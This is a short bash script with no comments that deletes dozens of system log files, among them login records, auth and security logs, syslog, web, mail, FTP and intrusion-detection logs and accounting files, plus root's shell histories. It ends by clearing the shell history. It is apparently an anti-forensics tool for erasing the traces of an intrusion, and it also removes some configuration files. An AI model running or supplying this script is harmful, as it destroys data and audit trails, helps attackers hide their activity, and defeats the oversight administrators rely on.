#!/bin/bash

rm /var/log/lastlog 
rm /var/log/messages 
rm /var/log/warn 
rm /var/log/wtmp 
rm /var/log/poplog 
rm /var/log/qmail 
rm /var/log/smtpd 
rm /var/log/telnetd 
rm /var/log/secure 
rm /var/log/auth 
rm /var/log/auth.log 
rm /var/log/cups/access_log 
rm /var/log/cups/error_log 
rm /var/log/thttpd_log 
rm /var/log/spooler 
rm /var/spool/tmp 
rm /var/spool/errors 
rm /var/spool/locks 
rm /var/log/nctfpd.errs 
rm /var/log/acct 
rm /var/apache/log 
rm /var/apache/logs 
rm /usr/local/apache/log 
rm /usr/local/apache/logs 
rm /usr/local/www/logs/thttpd_log 
rm /var/log/news 
rm /var/log/news/news 
rm /var/log/news.all 
rm /var/log/news/news.all 
rm /var/log/news/news.crit 
rm /var/log/news/news.err 
rm /var/log/news/news.notice 
rm /var/log/news/suck.err 
rm /var/log/news/suck.notice 
rm /var/log/xferlog 
rm /var/log/proftpd/xferlog.legacy 
rm /var/log/proftpd.xferlog 
rm /var/log/proftpd.access_log 
rm /var/log/httpd/error_log 
rm /var/log/httpsd/ssl_log 
rm /var/log/httpsd/ssl.access_log 
rm /var/adm 
rm /var/run/utmp 
rm /etc/wtmp 
rm /etc/utmp 
rm /etc/mail/access 
rm /var/log/mail/info.log 
rm /var/log/mail/errors.log 
rm /var/log/httpd/*_log 
rm /var/log/ncftpd/misclog.txt 
rm /var/account/pacct 
rm /var/log/snort 
rm /var/log/bandwidth 
rm /var/log/explanations 
rm /var/log/syslog 
rm /var/log/user.log 
rm /var/log/daemons/info.log 
rm /var/log/daemons/warnings.log 
rm /var/log/daemons/errors.log 
rm /etc/httpd/logs/error_log 
rm /etc/httpd/logs/*_log 
rm /var/log/mysqld/mysqld.log
rm /root/.ksh_history 
rm /root/.bash_history 
rm /root/.sh_history 
rm /root/.history 
rm /root/*_history 
rm /root/.login 
rm /root/.logout 
rm /root/.bash_logut 
rm /root/.Xauthority
rm ~/.bash_history
history -c
